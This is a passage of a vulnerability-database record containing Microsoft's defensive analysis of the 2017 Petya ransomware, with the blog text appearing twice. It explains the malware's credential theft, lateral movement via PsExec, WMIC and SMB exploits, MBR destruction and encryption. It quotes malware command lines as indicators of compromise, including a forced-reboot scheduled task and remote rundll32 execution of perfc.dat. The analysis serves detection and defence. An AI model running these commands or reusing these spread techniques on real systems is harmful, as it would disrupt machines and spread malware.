However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-encryption-1.png)\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-exploit-udpate.png)\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-MBR-overwrite-udpate.png)\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. 
For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which reports a supposed drive error and shows a fake integrity check:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-fake-message.png)\n\nIt then displays this ransom note:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-ransom-note.png)\n\nThe malware tries to overwrite the MBR code only if it is running with the highest privilege (i.e., with _SeDebugPrivilege_ enabled).\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders on all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of the usual _ReadFile()_/_WriteFile()_ APIs:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-file-mapping-API.png)\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. 
Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-rsa-public-encryption-key.png)\n\n_Embedded RSA public key_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-aes-128-key.png)\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-infect-mbr.png)\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-readme.png)\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. 
Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offer machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ under a different filename, and the creation of the _perfc.dat_ file on remote share (UNC) paths.\n\nToday, without the need for additional updates, an infected machine may look like this:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP1.png)\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. This user account has been compromised and could represent the user associated with patient-zero:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-windows-defender-ATP2.png)\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. 
Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, customers can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. These may have large impacts on the capability of your network, but may be appropriate for a very short period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy itself to, and execute on, remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. 
Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 
x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST &lt;time&gt;_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which 
captures tasks registered with the Task Scheduler service.\n\n * Lateral Movement (Remote WMI) \n * _\"process call create \\\"C:\\\\\\Windows\\\\\\System32\\\\\\rundll32.exe \\\\\\\\\\\"C:\\\\\\Windows\\\\\\perfc.dat\\\\\\\\\\\" #1\"_\n\n**Network indicators**\n\nIn environments where NetFlow data are available, this ransomware\u2019s subnet-scanning behavior may be observed by looking for the following:\n\n * Workstations scanning ports tcp/139 and tcp/445 on their own local (/24) network scope\n * Servers (in particular, domain controllers) scanning ports tcp/139 and tcp/445 across multiple /24 scopes\n\n_ _", "edition": 1, "enchantments": {"dependencies": {"modified": "2017-09-15T09:08:41", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mmpc"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144"], "type": "mscve"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C", "SECURELIST:094B9FCE59977DD96C94BBF6A95D339E"], "type": "securelist"}, {"idList": 
["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["SMNTC-96705", "SMNTC-96704"], "type": "symantec"}, {"idList": ["THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD"], "type": "threatpost"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97"], "type": "avleonov"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031"], "type": "exploitdb"}, {"idList": ["MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"], "type": "mssecure"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["CVE-2017-0144", "CVE-2017-0145"], "type": "cve"}, {"idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A"], "type": "rapid7blog"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": 
"kaspersky"}, {"idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"], "type": "saint"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2017-09-15T09:08:41", "rev": 2, "value": 7.6, "vector": "NONE"}}, "hash": "00bc14448de35f88f178d40771869aa7b7924e1139d3cc785a5a94c9694749b1", "hashmap": [{"hash": "baa30f28b70995adbfcbcd6ddaba2ec0", "key": "title"}, {"hash": "9158c03164fb6db0c440fdb287e68855", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "696a19be15ef6061e7b6c7e4759f53bb", "key": "published"}, {"hash": "126ac9f6149081eb0e97c2e939eaad52", "key": "bulletinFamily"}, {"hash": "696a19be15ef6061e7b6c7e4759f53bb", "key": "modified"}, {"hash": "ff956db5f2cf47d328e1cbc09bc91885", "key": "description"}, {"hash": "2206031ddfa442c2eb57dd17e9fcf174", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "10dc22e225dabcc0845efb8de70d835b", "key": "href"}, {"hash": "2ed33d64012a372c3bd45d454ea4fb3b", "key": "cvelist"}], "history": [], "href": "https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/", "id": "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "immutableFields": [], "lastseen": "2017-09-15T09:08:41", "modified": "2017-06-28T06:57:43", "objectVersion": 
"1.5", "published": "2017-06-28T06:57:43", "references": [], "reporter": "msft-mmpc", "title": "New ransomware, old techniques: Petya adds worm capabilities", "type": "mmpc", "viewCount": 952}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2017-09-15T09:08:41"}, {"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>).)_\n\n \n\nOn June 27, 2017 reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allows it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar codes and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. 
These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. 
GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that the _EzVit.exe_ process from MEDoc, for unknown reasons, at some point executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/129.png)\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs), which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities, it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities on unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions open across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. 
A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) to scan for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary to the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute the malware remotely using either the PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored in the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic), it uses that credential to propagate through the network.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-access-admin.png)\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. 
It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-wmic.png)\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet.png)\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-packet-2.png)\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). 
However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-encryption-1.png)\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-smb-exploit-udpate.png)\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-MBR-overwrite-udpate.png)\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. 
For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"&lt;system folder&gt;\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which reports a supposed drive error and shows a fake integrity check:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-fake-message.png)\n\nIt then displays this ransom note:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-ransom-note.png)\n\nThe malware tries to overwrite the MBR code only if it is running with the highest privilege (i.e., with _SeDebugPrivilege_ enabled).\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders on all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of the usual _ReadFile()_/_WriteFile()_ APIs:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-file-mapping-API.png)\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. 
Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-rsa-public-encryption-key.png)\n\n_Embedded RSA public key_\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-aes-128-key.png)\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for files encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-infect-mbr.png)\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n![](https://msdnshared.blob.core.windows.net/media/2017/06/petya-readme.png)\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows 